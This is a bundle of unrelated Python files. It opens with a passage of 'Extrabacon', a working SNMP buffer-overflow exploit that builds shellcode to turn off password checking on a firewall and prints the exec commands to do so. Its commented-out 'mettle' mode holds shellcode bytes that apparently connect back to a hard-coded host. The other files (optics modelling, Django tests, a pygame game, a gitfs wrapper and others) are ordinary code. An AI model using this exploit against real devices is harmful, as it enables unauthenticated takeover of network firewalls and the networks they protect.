        # A version is "supported" iff a pre-generated shellcode module for
        # it exists under improved_dir.
        # NOTE(review): `os` is not imported explicitly in this file's import
        # block; it presumably arrives via the star imports above — confirm.
        fname = improved_dir + '/shellcode_' + version + '.py'
        if not os.path.isfile(fname):
            return "unsupported"
        return version
    def post_touch(self, response):
        """Parse the touch response, print uptime/name, and record the
        firmware version (or 'unsupported') as key data."""
        ##
        ##
        values = [x[SNMPvarbind].value.val for x in SNMP(response)[SNMP][SNMPresponse].varbindlist]
        if not values:
            return False
        ##
        snmp = SNMP(response)
        print "[+] response:"
        snmp.show()
        # values[1] is sysUpTime in hundredths of a second (SNMP time ticks).
        fw_uptime = values[1]
        fw_uptime_str = str(datetime.timedelta(seconds=fw_uptime/100))
        print
        print "[+] firewall uptime is %d time ticks, or %s" % (fw_uptime, fw_uptime_str)
        print
        fw_name = values[2]
        print "[+] firewall name is %s" % fw_name
        print
        # values[0] is sysDescr, which carries the firmware version string.
        fw_vers = self.fw_version_check(values[0])
        if fw_vers != "unsupported":
            print "[+] target is running %s, which is supported" % fw_vers
        else:
            print "[-] target is running %s, which is NOT supported" % values[0]
        self.key_data = fw_vers ## persisted in the key file for later 'exec'
        if self.params.verbose:
            print 'Data stored in key file : %s' % self.key_data
        ##
        ##
        return True
    def load_vinfo(self):
        # Normalize the stored version token for display/lookup.
        self.vinfo = self.key_data.upper()
        if self.params.verbose:
            print 'Data stored in self.vinfo: %s' % self.vinfo
    def report_key(self, key):
        """Print follow-up command lines for the recorded key."""
        print "\nTo check the key file to see if it really contains what we're claiming:"
        print "# cat %s" % self.get_key_file(key = key)
        # No usable follow-up commands for unsupported targets.
        if self.key_data.lower() == "unsupported":
            return
        print "\nTo disable password checking on target:"
        print "# %s exec -k %s %s --mode pass-disable" % (self.env.progname, key, " ".join(self.params.args[2:]))
        print "\nTo enable password checking on target:"
        print "# %s exec -k %s %s --mode pass-enable" % (self.env.progname, key, " ".join(self.params.args[2:]))
        ##
        ##
        ##
        print
    def generate_exploit(self):
        """Build the single version-specific SNMP packet for the selected
        mode, using the imported per-version shellcode module."""
        if not self.params.mode:
            print "[-] no mode selected!"
            sys.exit(1)
        print "[+] generating exploit for exec mode %s" % self.params.mode
        if self.key_data.lower() == "unsupported":
            print "[-] unsupported target version, abort"
            sys.exit(1)
        if os.path.exists(improved_dir):
            print "[+] using shellcode in %s" % improved_dir
            sys.path.insert(0, improved_dir)
        else:
            print "[-] cannot find %s" % (improved_dir)
            sys.exit(1)
        # Per-version constants live in a module named shellcode_<version>.
        self.sc_filename = "shellcode_%s" % self.key_data.lower()
        print "[+] importing version-specific shellcode %s" % self.sc_filename
        try:
            sc = __import__(self.sc_filename)
        except:
            print "[-] problem importing version-specific shellcode from %s" % self.sc_filename
            sys.exit(1)
        ##
        # cufwUrlfServerStatus + .9
        head = '1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9'
        head_len = len(head.split('.'))
        # do we patch, or restore original code
        if self.params.mode == 'pass-disable':
            always_true_code = "49.192.64.195"
            pmcheck_bytes = always_true_code
            admauth_bytes = always_true_code
        else:
            pmcheck_bytes = sc.pmcheck_code
            admauth_bytes = sc.admauth_code
        # The payload is encoded as dot-separated decimal byte values so it
        # can be embedded in an OID; constants come from the sc module.
        preamble_snmp = ""
        preamble_snmp += "49.219.49.246.49.201.49.192.96.49.210.128.197.16.128.194.7.4.125.80.187."
        preamble_snmp += sc.pmcheck_bounds
        preamble_snmp += ".205.128.88.187."
        preamble_snmp += sc.admauth_bounds
        preamble_snmp += ".205.128.199.5."
        preamble_snmp += sc.pmcheck_offset
        preamble_snmp += "."
        preamble_snmp += pmcheck_bytes
        preamble_snmp += ".199.5."
        preamble_snmp += sc.admauth_offset
        preamble_snmp += "."
        preamble_snmp += admauth_bytes
        preamble_snmp += ".97.104."
        preamble_snmp += sc.saferet_offset
        preamble_snmp += ".128.195.16.191.11.15.15.15.137.229.131.197."
        preamble_snmp += sc.fix_ebp
        preamble_snmp += ".204.195"
        if self.params.mode == 'mettle':
            # Experimental mode; the stage below is left commented out.
            preamble_snmp = "49.219.49.246.49.201.49.192.96.49.210."
            buf = ""
            #buf += "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd"
            #buf += "\x80\x97\x5b\x68\x0a\x1e\x0a\x89\x66\x68\x11\x5c\x66"
            #buf += "\x53\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd"
            #buf += "\x80\x5b\x99\xb6\x0c\xb0\x03\xcd\x80"#\xff\xe1"
            for c in buf:
                preamble_snmp += "%d." % int(binascii.hexlify(c), 16)
            preamble_snmp += "97.104."
            preamble_snmp += sc.saferet_offset
            preamble_snmp += ".128.195.16.191.11.15.15.15.137.229.131.197.72.195"
        wrapper = preamble_snmp
        wrapper_len = len(wrapper.split('.'))
        # Pad with NOPs (144 == 0x90) to a fixed 82-element wrapper.
        wrapper += ".144" * (82 - wrapper_len)
        ##
        launcher = "139.124.36.20.139.7.255.224.144"
        overflow = string.join([head, "95", wrapper, sc.jmp_esp_offset, launcher], ".")
        ## removed superfluous length checks
        if len(overflow.split('.')) != 112:
            # NOTE(review): `overflow_len` is undefined here — this error path
            # would itself raise NameError instead of printing; it should
            # interpolate len(overflow.split('.')).
            print "[-] problem with overflow_len (%d != 112)" % overflow_len
            sys.exit(1)
        # Random request-id lets post_exploit() match the response to us.
        self.params.request_id = random.randint(0x80000, 0x1fffffff)
        print "[+] random SNMP request-id %d" % self.params.request_id
        # we don't need to fix the launcher offset, only build 1 packet
        # also, we can remove the payload varbind
        exba_msg = SNMP(version=self.params.version,
                        community=self.params.community,
                        PDU=SNMPbulk(id=ASN1_INTEGER(self.params.request_id),
                                     max_repetitions=1,
                                     varbindlist=[SNMPvarbind(oid=ASN1_OID(overflow))]
                                     )
                        )
        if self.params.verbose:
            print "overflow (112): %s" % overflow
            print "EXBA msg (%d): %s" % (len(exba_msg), binascii.hexlify(exba_msg[SNMP].__str__()))
        ##
        # Hard upper bound on the final message size.
        if len(exba_msg) >= 512:
            print "[-] final SNMP msg is too large (%d >= %d) abort" % (len(exba_msg), 512)
            sys.exit(1)
        ##
        ##
        ##
        ret_list = [exba_msg]
        return(ret_list)
    def post_exploit(self, response):
        """Check that the response's request-id matches the random id we sent."""
        ##
        ##
        snmp = SNMP(response)
        print "[+] response:"
        snmp.show()
        recv_id = int(snmp.PDU.id.val)
        if recv_id == self.params.request_id:
            print "[+] received SNMP id %d, matches random id sent, likely success" % recv_id
            return True
        else:
            print "[-] received SNMP id %d, expecting %d, mismatch! This is probably bad" % (recv_id, self.params.request_id)
            return False
if __name__ == '__main__':
    # Entry point: construct the sploit with its name/version, hand over argv.
    exp = Extrabacon('Extrabacon', '1.1.0.1')
    exp.launch(sys.argv)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: Apache-2.0
# SPDX-FileCopyrightText: © 2021 Massachusetts Institute of Technology.
# SPDX-FileCopyrightText: © 2021 Lee McCuller <mcculler@mit.edu>
# NOTICE: authors should document their contributions in concisely in NOTICE
# with details inline in source files, comments, and docstrings.
"""
"""
from .. import base
class Circulator4(base.OpticalObject):
    """
    A perfect 4-port optical circulator. Cycles the optical ports A->B->C->D->A
    """
    # Port labels in circulation order; each port feeds the next, cyclically.
    _PORT_CYCLE = ("A", "B", "C", "D")

    def port_chain(self, p, pname):
        # Transmission ("-t") through port X continues at the next port.
        for idx, label in enumerate(self._PORT_CYCLE):
            if pname == "+%s-t" % label:
                succ = self._PORT_CYCLE[(idx + 1) % len(self._PORT_CYCLE)]
                return (None, "+" + succ)
        return super(Circulator4, self).port_chain(p, pname)

    @classmethod
    def visit_port_information(cls, manip):
        for label in cls._PORT_CYCLE:
            manip.gen_optical_port("+" + label, label)
        return

    def visit_matrix_algorithm_ACDC(self, manip):
        # Unity coupling from each input to the next port's output.
        cycle = self._PORT_CYCLE
        for idx, label in enumerate(cycle):
            succ = cycle[(idx + 1) % len(cycle)]
            manip.add_link(label + "!i", succ + "!o", 1)
        return

    def visit_mode_matching_linkage(self, manip):
        cycle = self._PORT_CYCLE
        for idx, label in enumerate(cycle):
            succ = cycle[(idx + 1) % len(cycle)]
            manip.add_link(label + "!i", succ + "!o", None)
        return
|
# Read a CSV-like file whose first line is a header row, print the header
# fields, then print each remaining row as three right-aligned columns.
# BUG FIX: the original opened the file without ever closing it; the context
# manager guarantees the handle is released.
with open("nomes.txt", "r") as f:
    lines = f.readlines()
title = lines[0]
names = title.strip().split(",")
print(names)
for row in lines[1:]:
    fields = row.strip().split(",")
    # Column widths: first field as-is, second padded to 5, third to 8.
    print('{}{:>5}{:>8}'.format(fields[0], fields[1], fields[2]))
|
from http import HTTPStatus
from django.urls import reverse
from mock import patch
from core.tests import MarketAccessTestCase
class EditWTOStatusTestCase(MarketAccessTestCase):
    """Validation and submission tests for the barrier 'edit WTO status' view."""

    def _submit(self, data=None):
        # POST the edit-WTO-status form for this test's barrier.
        url = reverse(
            "barriers:edit_wto_status", kwargs={"barrier_id": self.barrier["id"]}
        )
        return self.client.post(url, data=data)

    @patch("utils.api.resources.APIResource.patch")
    def test_empty_wto_has_been_notified_error(self, mock_patch):
        # An empty submission must flag only the first question.
        response = self._submit()
        assert response.status_code == HTTPStatus.OK
        assert "form" in response.context
        form = response.context["form"]
        assert not form.is_valid()
        assert "wto_has_been_notified" in form.errors
        assert "wto_should_be_notified" not in form.errors
        assert not mock_patch.called

    @patch("utils.api.resources.APIResource.patch")
    def test_empty_wto_should_be_notified_error(self, mock_patch):
        # Answering "no" to the first question makes the second required.
        response = self._submit({"wto_has_been_notified": "no"})
        assert response.status_code == HTTPStatus.OK
        assert "form" in response.context
        form = response.context["form"]
        assert not form.is_valid()
        assert "wto_has_been_notified" not in form.errors
        assert "wto_should_be_notified" in form.errors
        assert not mock_patch.called

    @patch("utils.api.resources.APIResource.patch")
    def test_success_wto_has_been_notified(self, mock_patch):
        response = self._submit({"wto_has_been_notified": "yes"})
        assert response.status_code == HTTPStatus.FOUND
        mock_patch.assert_called_with(
            id=self.barrier["id"],
            wto_profile={
                "wto_has_been_notified": True,
                "wto_should_be_notified": None,
            },
        )

    @patch("utils.api.resources.APIResource.patch")
    def test_success_should_be_notified(self, mock_patch):
        response = self._submit(
            {"wto_has_been_notified": "no", "wto_should_be_notified": "yes"}
        )
        assert response.status_code == HTTPStatus.FOUND
        mock_patch.assert_called_with(
            id=self.barrier["id"],
            wto_profile={
                "wto_has_been_notified": False,
                "wto_should_be_notified": True,
            },
        )

    @patch("utils.api.resources.APIResource.patch")
    def test_success_should_not_be_notified(self, mock_patch):
        response = self._submit(
            {"wto_has_been_notified": "no", "wto_should_be_notified": "no"}
        )
        assert response.status_code == HTTPStatus.FOUND
        mock_patch.assert_called_with(
            id=self.barrier["id"],
            wto_profile={
                "wto_has_been_notified": False,
                "wto_should_be_notified": False,
            },
        )
|
# %%
from time import time
from bullet import Bullet
import pygame
from setting import Settings
from plane import Plane
import game_func as gf
from pygame.sprite import Group
from 敌机 import Eplane
from game_stats import GameStats
from button import Button
from scoreboard import Scoreboard
import time
def run_game():
    """Initialise pygame and run the aircraft game's main loop.

    Sets up the window, background music, sprite groups and HUD, then loops
    forever: handling input events, spawning enemy planes, updating sprites
    and redrawing the screen while the game is active.

    Local state (the original docstring listed these as "Args", but the
    function takes none):
        air_settings (Settings): the game's configuration values.
        screen: the pygame display surface.
        play_button (Button): the "Play" button shown before a game starts.
        bullets (Group): bullets fired by the player's plane.
        eplanes (Group): the group of enemy planes.
        plane (Plane): the player's plane.
        stats (GameStats): game statistics and the game-active flag.
        score_board (Scoreboard): the score display.
    """
    pygame.init()
    # Background music loops indefinitely at reduced volume.
    pygame.mixer.init()
    pygame.mixer.music.load('resources/sound/game_music.wav')
    pygame.mixer.music.play(-1, 0.0)
    pygame.mixer.music.set_volume(0.25)
    air_settings = Settings()
    screen = pygame.display.set_mode((air_settings.screen_width, air_settings.screen_height))
    pygame.display.set_caption("Aircraft Battle")
    play_button = Button(air_settings, screen, "Play")
    bullets = Group()
    eplanes = Group()
    plane = Plane(screen, air_settings)
    # NOTE(review): this single Eplane appears unused (enemies are spawned
    # into `eplanes` below) — confirm Eplane.__init__ has no needed side
    # effects before removing it.
    eplane = Eplane(air_settings, screen)
    enemy_frequency = 0
    stats = GameStats(air_settings)
    score_board = Scoreboard(air_settings, screen, stats)
    while True:
        gf.check_events(plane, air_settings, screen, bullets, stats, play_button, eplanes, score_board)
        if stats.game_active:
            # NOTE(review): the counter resets at 100, so the "% 200" test
            # only ever matches 0 — i.e. one enemy spawns every 100 frames.
            # Confirm whether 200 was intended.
            if enemy_frequency % 200 == 0:
                gf.creat_eplane(air_settings, screen, eplanes)
            enemy_frequency += 1
            if enemy_frequency >= 100:
                enemy_frequency = 0
            plane.update()
            gf.update_bullets(bullets, eplanes, air_settings, screen, plane, stats, score_board)
            gf.update_eplanes(air_settings, eplanes, plane, stats, screen, bullets, score_board)
        gf.update_screen(screen, air_settings.bg_color, plane, bullets, eplanes, stats, play_button, score_board)


if __name__ == '__main__':
    # BUG FIX (idiom): guard the entry point so the game no longer launches
    # as a side effect of merely importing this module.
    run_game()
|
from flytekitplugins.spark import Spark
from mock import MagicMock
from flytekit import task
from flytekit.configuration import Config, SerializationSettings
from flytekit.remote.remote import FlyteRemote
def test_spark_template_with_remote():
    """Registering a Spark task via FlyteRemote must serialize the Spark
    custom fields (mainApplicationFile, sparkConf); a plain Python task must
    serialize with no custom field at all."""
    @task(task_config=Spark(spark_conf={"spark": "1"}))
    def my_spark(a: str) -> int:
        return 10
    @task
    def my_python_task(a: str) -> int:
        return 10
    remote = FlyteRemote(
        config=Config.for_endpoint(endpoint="localhost", insecure=True), default_project="p1", default_domain="d1"
    )
    # Replace the gRPC client with a mock so no network traffic happens; the
    # serialized spec is captured from the mocked create_task call args.
    mock_client = MagicMock()
    remote._client = mock_client
    remote.register_task(
        my_spark,
        serialization_settings=SerializationSettings(
            image_config=MagicMock(),
        ),
        version="v1",
    )
    serialized_spec = mock_client.create_task.call_args.kwargs["task_spec"]
    print(serialized_spec)
    # Check if the serialized spark task has the mainApplicationFile field set.
    assert serialized_spec.template.custom["mainApplicationFile"]
    assert serialized_spec.template.custom["sparkConf"]
    remote.register_task(
        my_python_task, serialization_settings=SerializationSettings(image_config=MagicMock()), version="v1"
    )
    serialized_spec = mock_client.create_task.call_args.kwargs["task_spec"]
    # Check that the serialized python task has no custom field set by default.
    assert serialized_spec.template.custom is None
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from telemetry.page import shared_page_state
class FlingGestureSupportedSharedState(shared_page_state.SharedPageState):
  """Shared page state that only runs on browsers supporting fling gestures."""

  def CanRunOnBrowser(self, browser_info):
    # Guard-clause form: succeed early when the capability is present.
    if browser_info.HasFlingGestureSupport():
      return True
    logging.warning('Browser does not support fling gestures, skipping test')
    return False
|
from django.conf import settings
# max number of objects to return per page from Zapier trigger endpoints;
# overridable via the ZAPIER_TRIGGER_DEFAULT_PAGE_SIZE Django setting.
DEFAULT_PAGE_SIZE = getattr(settings, "ZAPIER_TRIGGER_DEFAULT_PAGE_SIZE", 25)
|
# Copyright 2014-2016 Presslabs SRL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from collections import namedtuple
from shutil import rmtree
from stat import S_IFDIR, S_IFREG, S_IFLNK
from pygit2 import (
clone_repository,
Signature,
GIT_SORT_TOPOLOGICAL,
GIT_FILEMODE_TREE,
GIT_STATUS_CURRENT,
GIT_FILEMODE_LINK,
GIT_FILEMODE_BLOB,
GIT_BRANCH_REMOTE,
GIT_BRANCH_LOCAL,
GIT_FILEMODE_BLOB_EXECUTABLE,
)
from six import iteritems
from gitfs.cache import CommitCache
from gitfs.log import log
from gitfs.utils.path import split_path_into_components
from gitfs.utils.commits import CommitsList
# Result of comparing two branches: the commit at which they diverged plus
# the commits unique to each branch (see Repository.find_diverge_commits).
DivergeCommits = namedtuple(
    "DivergeCommits", ["common_parent", "first_commits", "second_commits"]
)
class Repository(object):
    """Wrapper around a ``pygit2.Repository`` adding the helpers gitfs needs:
    divergence detection, a cached commit history, path-based object lookup
    and working-directory reconciliation after checkout.  Attribute access
    not found on this object is proxied to the underlying pygit2 repository.
    """

    def __init__(self, repository, commits=None):
        # repository: a pygit2.Repository; commits: optional pre-built cache.
        self._repo = repository
        self.commits = commits or CommitCache(self)
        self.behind = False

    def __getitem__(self, item):
        """
        Proxy method for pygit2.Repository
        """
        return self._repo[item]

    def __getattr__(self, attr):
        """
        Proxy method for pygit2.Repository
        """
        # __getattr__ is only invoked after normal lookup fails, so the
        # else-branch below is defensive and should be unreachable.
        if attr not in self.__dict__:
            return getattr(self._repo, attr)
        else:
            return self.__dict__[attr]

    def ahead(self, upstream, branch):
        """Return True if local *branch* has commits missing from *upstream*."""
        ahead, _ = self.diverge(upstream, branch)
        return ahead

    def diverge(self, upstream, branch):
        """Return an ``(ahead, behind)`` bool pair for *branch* relative to
        its *upstream* counterpart."""
        reference = "{}/{}".format(upstream, branch)
        remote_branch = self._repo.branches.remote.get(reference)
        local_branch = self._repo.branches.local.get(branch)
        # TODO: check for missing branches
        if remote_branch.target == local_branch.target:
            return False, False
        diverge_commits = self.find_diverge_commits(local_branch, remote_branch)
        behind = len(diverge_commits.second_commits) > 0
        ahead = len(diverge_commits.first_commits) > 0
        return ahead, behind

    def checkout(self, ref, *args, **kwargs):
        """Checkout *ref*, then reconcile the working directory: delete
        untracked leftovers and restore the file modes recorded in git."""
        result = self._repo.checkout(ref, *args, **kwargs)
        # update ignore cache after a checkout
        self.ignore.update()
        status = self._repo.status()
        # Renamed the loop variable: the original rebound `status` inside the
        # loop, shadowing the dict being iterated.
        for path, file_status in iteritems(status):
            # path is in current status, move on
            if file_status == GIT_STATUS_CURRENT:
                continue
            # check if file exists or not
            full_path = self._full_path(path)
            if path not in self._repo.index:
                if path not in self.ignore:
                    try:
                        os.unlink(full_path)
                    except OSError:
                        # path points to a directory containing untracked files
                        rmtree(
                            full_path,
                            onerror=lambda function, fpath, excinfo: log.info(
                                "Repository: Checkout couldn't delete %s", fpath
                            ),
                        )
                continue
            # check files stats
            stats = self.get_git_object_default_stats(ref, path)
            current_stat = os.lstat(full_path)
            if stats["st_mode"] != current_stat.st_mode:
                try:
                    os.chmod(full_path, current_stat.st_mode)
                except OSError:
                    log.info("Repository: Checkout couldn't chmod %s", full_path)
                self._repo.index.add(self._sanitize(path))
        return result

    def _sanitize(self, path):
        """Strip a leading slash so *path* is valid for the git index."""
        if path is not None and path.startswith("/"):
            path = path[1:]
        return path

    def push(self, upstream, branch, credentials):
        """ Push changes from a branch to a remote
        Examples::
            repo.push("origin", "master")
        """
        remote = self.get_remote(upstream)
        remote.push(["refs/heads/%s" % branch], callbacks=credentials)

    def fetch(self, upstream, branch_name, credentials):
        """
        Fetch from remote and return True if we are behind or False otherwise
        """
        remote = self.get_remote(upstream)
        remote.fetch(callbacks=credentials)
        _, behind = self.diverge(upstream, branch_name)
        self.behind = behind
        return behind

    def commit(self, message, author, commiter, parents=None, ref="HEAD"):
        """ Wrapper for create_commit. It creates a commit from a given ref
        (default is HEAD). Returns None when there is nothing to commit.
        """
        status = self._repo.status()
        if status == {}:
            return None
        # sign the author
        author = Signature(author[0], author[1])
        commiter = Signature(commiter[0], commiter[1])
        # write index locally
        tree = self._repo.index.write_tree()
        self._repo.index.write()
        # get parent
        if parents is None:
            parents = [self._repo.revparse_single(ref).id]
        return self._repo.create_commit(ref, author, commiter, message, tree, parents)

    @classmethod
    def clone(cls, remote_url, path, branch=None, credentials=None):
        """Clone a repo in a given path and update the working directory with
        a checkout to head (GIT_CHECKOUT_SAFE_CREATE)
        :param str remote_url: URL of the repository to clone
        :param str path: Local path to clone into
        :param str branch: Branch to checkout after the
            clone. The default is to use the remote's default branch.
        """
        try:
            repo = clone_repository(
                remote_url, path, checkout_branch=branch, callbacks=credentials
            )
        except Exception:
            # BUG FIX: the original swallowed the error here and then crashed
            # with a NameError on the undefined `repo` below; log and
            # propagate the real failure instead.
            log.error("Error on cloning the repository: ", exc_info=True)
            raise
        repo.checkout_head()
        return cls(repo)

    def _is_searched_entry(self, entry_name, searched_entry, path_components):
        """
        Checks if a tree entry is the one that is being searched for. For
        that, the name has to correspond and it has to be the last element
        in the path_components list (this means that the path corresponds
        exactly).
        :param entry_name: the name of the tree entry
        :param searched_entry: the name of the object that is being searched
            for
        :type searched_entry: str
        :param path_components: the path of the object being searched for
        :type path_components: list
        """
        return (
            entry_name == searched_entry
            and len(path_components) == 1
            and entry_name == path_components[0]
        )

    def _get_git_object(self, tree, obj_name, path_components, modifier):
        """
        It recursively searches for the object in the repository. To declare
        an object as found, the name and the relative path have to correspond.
        It also includes the relative path as a condition for success, to avoid
        finding an object with the correct name but with a wrong location.
        :param tree: a `pygit2.Tree` instance
        :param obj_name: the name of the object
        :type obj_name: str
        :param path_components: the path of the object being searched for as
            a list (e.g: for '/a/b/c/file.txt' => ['a', 'b', 'c', 'file.txt'])
        :type path_components: list
        :param modifier: a function used to retrieve some specific
            characteristic of the git object
        :type modifier: function
        :returns: an instance corresponding to the object that is being
            searched for in case of success, or None otherwise.
        :rtype: one of the following:
            an instance of `pygit2.Tree`
            an instance of `pygit2.Blob`
            None
        """
        git_obj = None
        for entry in tree:
            if self._is_searched_entry(entry.name, obj_name, path_components):
                return modifier(entry)
            elif entry.filemode == GIT_FILEMODE_TREE:
                # Descend one level: drop the first path component.
                git_obj = self._get_git_object(
                    self._repo[entry.id], obj_name, path_components[1:], modifier
                )
                if git_obj:
                    return git_obj
        return git_obj

    def get_git_object_type(self, tree, path):
        """
        Returns the filemode of the git object with the relative path <path>.
        :param tree: a `pygit2.Tree` instance
        :param path: the relative path of the object
        :type path: str
        :returns: the filemode for the entry in case of success
            (which can be one of the following) or None otherwise.
            0     (0000000)  GIT_FILEMODE_NEW
            16384 (0040000)  GIT_FILEMODE_TREE
            33188 (0100644)  GIT_FILEMODE_BLOB
            33261 (0100755)  GIT_FILEMODE_BLOB_EXECUTABLE
            40960 (0120000)  GIT_FILEMODE_LINK
            57344 (0160000)  GIT_FILEMODE_COMMIT
        :rtype: int, None
        """
        path_components = split_path_into_components(path)
        try:
            return self._get_git_object(
                tree, path_components[-1], path_components, lambda entry: entry.filemode
            )
        except Exception:
            # Deliberate fallback to "directory" on any lookup failure;
            # narrowed from a bare except so KeyboardInterrupt/SystemExit
            # still propagate.
            return GIT_FILEMODE_TREE

    def get_git_object(self, tree, path):
        """
        Returns the git object with the relative path <path>.
        :param tree: a `pygit2.Tree` instance
        :param path: the relative path of the object
        :type path: str
        :returns: an instance corresponding to the object that is being
            searched for in case of success, or None otherwise.
        :rtype: one of the following:
            an instance of `pygit2.Tree`
            an instance of `pygit2.Blob`
            None
        """
        # It acts as a proxy for the _get_git_object method, which
        # does the actual searching.
        path_components = split_path_into_components(path)
        return self._get_git_object(
            tree,
            path_components[-1],
            path_components,
            lambda entry: self._repo[entry.id],
        )

    def get_git_object_default_stats(self, ref, path):
        """Return default stat fields (st_mode/st_nlink/st_size) for the git
        object at *path*, or None when the object type cannot be resolved."""
        types = {
            GIT_FILEMODE_LINK: {"st_mode": S_IFLNK | 0o444},
            GIT_FILEMODE_TREE: {"st_mode": S_IFDIR | 0o555, "st_nlink": 2},
            GIT_FILEMODE_BLOB: {"st_mode": S_IFREG | 0o444},
            GIT_FILEMODE_BLOB_EXECUTABLE: {"st_mode": S_IFREG | 0o555},
        }
        if path == "/":
            return types[GIT_FILEMODE_TREE]
        obj_type = self.get_git_object_type(ref, path)
        if obj_type is None:
            return obj_type
        stats = types[obj_type]
        if obj_type in [GIT_FILEMODE_BLOB, GIT_FILEMODE_BLOB_EXECUTABLE]:
            stats["st_size"] = self.get_blob_size(ref, path)
        return stats

    def get_blob_size(self, tree, path):
        """
        Returns the size of the data contained by a blob object
        with the relative path <path>.
        :param tree: a `pygit2.Tree` instance
        :param path: the relative path of the object
        :type path: str
        :returns: the size of data contained by the blob object.
        :rtype: int
        """
        return self.get_git_object(tree, path).size

    def get_blob_data(self, tree, path):
        """
        Returns the data contained by a blob object with the relative
        path <path>.
        :param tree: a `pygit2.Tree` instance
        :param path: the relative path of the object
        :type path: str
        :returns: the data contained by the blob object.
        :rtype: str
        """
        return self.get_git_object(tree, path).data

    def get_commit_dates(self):
        """
        Walk through all commits from current repo in order to compose the
        _history_ directory.
        """
        return list(self.commits.keys())

    def get_commits_by_date(self, date):
        """
        Retrieves all the commits from a particular date.
        :param date: date with the format: yyyy-mm-dd
        :type date: str
        :returns: a list containing the commits for that day. Each list item
            will have the format: hh:mm:ss-<short_sha1>, where short_sha1 is
            the short sha1 of the commit (first 10 characters).
        :rtype: list
        """
        return list(map(str, self.commits[date]))

    def walk_branches(self, sort, *branches):
        """
        Simple iterator which take a sorting strategy and some branch and
        iterates through those branches one commit at a time, yielding a list
        of commits
        :param sort: a sorting option `GIT_SORT_NONE, GIT_SORT_TOPOLOGICAL,
            GIT_SORT_TIME, GIT_SORT_REVERSE`. Default is 'GIT_SORT_TOPOLOGICAL'
        :param branches: branch to iterate through
        :type branches: list
        :returns: yields a list of commits corresponding to given branches
        :rtype: list
        """
        iterators = [iter(self._repo.walk(branch.target, sort)) for branch in branches]
        stop_iteration = [False for branch in branches]
        commits = []
        # Prime one commit per branch (None for an already-empty walker).
        for iterator in iterators:
            try:
                commit = next(iterator)
            except StopIteration:
                commit = None
            commits.append(commit)
        yield (commit for commit in commits)
        # Advance each walker in lockstep until all are exhausted; a walker
        # that stops keeps yielding its last commit.
        while not all(stop_iteration):
            for index, iterator in enumerate(iterators):
                try:
                    commit = next(iterator)
                    commits[index] = commit
                except StopIteration:
                    stop_iteration[index] = True
            if not all(stop_iteration):
                yield (commit for commit in commits)

    def remote_head(self, upstream, branch):
        """Return the commit object at the tip of *upstream*/*branch*."""
        ref = "%s/%s" % (upstream, branch)
        remote = self._repo.lookup_branch(ref, GIT_BRANCH_REMOTE)
        return remote.get_object()

    def get_remote(self, name):
        """ Retrieve a remote by name. Raise a ValueError if the remote was not
        added to repo
        Examples::
            repo.get_remote("fork")
        """
        remote = [remote for remote in self._repo.remotes if remote.name == name]
        if not remote:
            raise ValueError("Missing remote")
        return remote[0]

    def _full_path(self, partial):
        """Join a (possibly slash-prefixed) repo-relative path to the workdir."""
        if partial.startswith("/"):
            partial = partial[1:]
        return os.path.join(self._repo.workdir, partial)

    def find_diverge_commits(self, first_branch, second_branch):
        """
        Take two branches and find diverge commits.
              2--3--4--5
             /
        1--+               Return:
             \\              - common parent: 1
              6             - first list of commits: (2, 3, 4, 5)
                            - second list of commits: (6)
        :param first_branch: first branch to look for common parent
        :type first_branch: `pygit2.Branch`
        :param second_branch: second branch to look for common parent
        :type second_branch: `pygit2.Branch`
        :returns: a namedtuple with common parent, a list of first's branch
            commits and another list with second's branch commits
        :rtype: DivergeCommits (namedtuple)
        """
        common_parent = None
        first_commits = CommitsList()
        second_commits = CommitsList()
        walker = self.walk_branches(GIT_SORT_TOPOLOGICAL, first_branch, second_branch)
        for first_commit, second_commit in walker:
            # A commit seen from both sides means we've reached the junction.
            if first_commit in second_commits or second_commit in first_commits:
                break
            if first_commit not in first_commits:
                first_commits.append(first_commit)
            if second_commit not in second_commits:
                second_commits.append(second_commit)
            if second_commit.hex == first_commit.hex:
                break
        # Trim whichever list overshot past the common parent.
        try:
            index = second_commits.index(first_commit)
        except ValueError:
            pass
        else:
            second_commits = second_commits[:index]
            common_parent = first_commit
        try:
            index = first_commits.index(second_commit)
        except ValueError:
            pass
        else:
            first_commits = first_commits[:index]
            common_parent = second_commit
        return DivergeCommits(common_parent, first_commits, second_commits)
|
import cv2
import numpy as np
from rob9Utils.affordancetools import getPredictedAffordances
def convexHullFromContours(contours):
    """ Input:
            contours - list [cv2 contours]
        Output:
            hulls - list [N, cv2 hulls]
    """
    # One (non-clockwise) convex hull per input contour.
    return [cv2.convexHull(contour, False) for contour in contours]
def maskFromConvexHull(height, width, hulls):
    """ Input:
            height - int
            width - int
            hulls - cv2 hulls
        Output:
            im - np.array, bool, shape (h, w)
    """
    # Rasterize every hull, filled (thickness -1), onto one canvas.
    im = np.zeros((height, width))
    for i in range(len(hulls)):
        cv2.drawContours(im, hulls, i, (255, 255, 255), -1)
    # BUG FIX: the deprecated np.bool alias was removed in NumPy 1.24 and
    # raises AttributeError there; the builtin bool is the correct dtype.
    return im.astype(bool)
def thresholdMaskBySize(mask, threshold = 0.05):
    """ input:
            mask - binary mask of shape (h, w)
            threshold - threshold as total percentage of mask size
        output:
            mask_percentage_of_object - float, percentage size
            keep - boolean
    """
    total_pixels = mask.shape[0] * mask.shape[1]
    # Count pixels set to True (elementwise comparison kept as in the
    # original contract: the mask is expected to be boolean).
    true_pixels = np.count_nonzero(mask == True)
    mask_percentage_of_object = true_pixels / total_pixels
    keep = mask_percentage_of_object >= threshold
    return mask_percentage_of_object, keep
def removeOverlapMask(masks):
    """ Sets the pixels of intersection of unions of masks to 0
        Input:
            masks - np.array, shape (affordances, h, w)
        Output:
            masks - np.array, shape (affordances, h, w)
    """
    affordances = getPredictedAffordances(masks)
    count = len(affordances)
    # For every unordered pair of predicted affordances, clear the pixels
